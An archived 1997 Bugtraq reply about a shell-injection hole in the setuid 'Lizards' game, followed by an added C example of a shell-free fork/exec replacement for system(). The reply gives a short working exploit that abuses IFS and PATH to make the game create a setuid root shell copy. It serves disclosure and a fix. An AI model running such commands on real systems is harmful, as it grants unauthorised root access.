Bugtraq mailing list archives
Re: Vunerability in Lizards game
From: j-zbiciak1 () ti com (Joe Zbiciak)
Date: Tue, 18 Nov 1997 13:02:01 -0600
John Dow said previously:

| - but then again, my system("clear") wasn't particularly
| elegant either. How about system("/usr/bin/clear")?

That won't work. An attack along these lines will slice through that
"fix" pretty quickly, if I'm not mistaken.

    export IFS=/
    export PATH=.:$PATH
    echo "cp /bin/sh ./root_sh; chmod 4755 ./root_sh" > ./usr
    chmod 755 ./usr
    lizards

:-)

"system()" is just not cut out for security. *slightly* better would be
to exec /usr/bin/clear directly with a fork/exec. Or, if you're exiting
the game completely at that point (e.g. you have nothing left to do at
that point), just do an

    execl("/usr/bin/clear","clear",(char *)0);

and be done with it.

Regards,

--Joe

--
 +------------ Joseph Zbiciak -----------+
 |- - - - - j-zbiciak1 () ti com - - - - -|  You have the capacity to
 | - http://www.primenet.com/~im14u2c/ - |  learn from mistakes.
 |- - - -Texas Instruments, Dallas- - - -|  You will learn a lot today.
 +------#include <std_disclaimer.h>------+
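The fork/exec replacement for system("clear") suggested in the message, as an added example that is not part of the original post or of the Lizards source. The names run_direct and clear_screen are hypothetical, and the fixed child environment (including the assumed TERM=vt100) and the privilege drop before the exec go one step beyond what the message proposes.

```c
#include <errno.h>
#include <sys/types.h>
#include <sys/wait.h>
#include <unistd.h>

/* Fixed environment for the child; nothing is inherited from the caller.
 * TERM=vt100 is an assumed value so that clear can find its escape codes. */
static char *const clean_env[] = { "PATH=/usr/bin:/bin", "TERM=vt100", NULL };

/*
 * Run one program by absolute path with no shell in between.
 * Returns the child's exit status, 127 if the exec failed, -1 otherwise.
 */
int run_direct(const char *path, char *const argv[])
{
    pid_t pid;
    int status;

    if (path == NULL || path[0] != '/')
        return -1;                 /* never let PATH choose the binary */

    pid = fork();
    if (pid < 0)
        return -1;

    if (pid == 0) {
        /* Child: give up set-id privileges for good, group first. */
        if (setgid(getgid()) != 0 || setuid(getuid()) != 0)
            _exit(126);
        /* No /bin/sh is involved, so IFS and PATH are never interpreted. */
        execve(path, argv, clean_env);
        _exit(127);
    }

    while (waitpid(pid, &status, 0) < 0)
        if (errno != EINTR)
            return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

/* Drop-in for system("clear") in a set-id program (hypothetical helper). */
int clear_screen(void)
{
    char *const argv[] = { "clear", NULL };
    return run_direct("/usr/bin/clear", argv);
}

int main(void) { return clear_screen() == 0 ? 0 : 1; }
```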